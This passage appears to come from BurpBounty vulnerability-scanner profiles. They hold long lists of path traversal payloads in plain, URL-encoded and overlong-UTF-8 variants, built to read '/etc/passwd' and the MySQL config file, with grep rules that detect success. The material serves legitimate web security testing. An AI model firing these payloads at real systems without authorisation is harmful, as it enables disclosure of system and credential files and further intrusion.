"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,MySQL database server"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-mysql-conf",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/mysql/my.cnf",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-Path-bypass.bb | [
{
"ProfileName": "Linux-Path-bypass",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,/../{FILE}",
"true,/../../{FILE}",
"true,/../../../{FILE}",
"true,/../../../../{FILE}",
"true,/../../../../../{FILE}",
"true,/../../../../../../{FILE}",
"true,/../../../../../../../{FILE}",
"true,/../../../../../../../../{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"PathTraversal",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-path-bypass",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/passwd",
"regex": "String"
},
{
"type": "Request",
"match": "([a-zA-Z0-9\\s_\\\\.\\-\\(\\):])+(.png|.jpg|.gif|.bmp|.jpeg|.PNG|.JPG|.GIF|.BMP|.JPEG)",
"replace": "{PAYLOAD}",
"regex": "Regex"
}
],
"VariationAttributes": [],
"InsertionPointType": [
34
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-Path.bb | [
{
"ProfileName": "Linux-Path",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,../../{FILE}",
"true,../..//{FILE}",
"true,../..///{FILE}",
"true,../..//../{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//..///{FILE}",
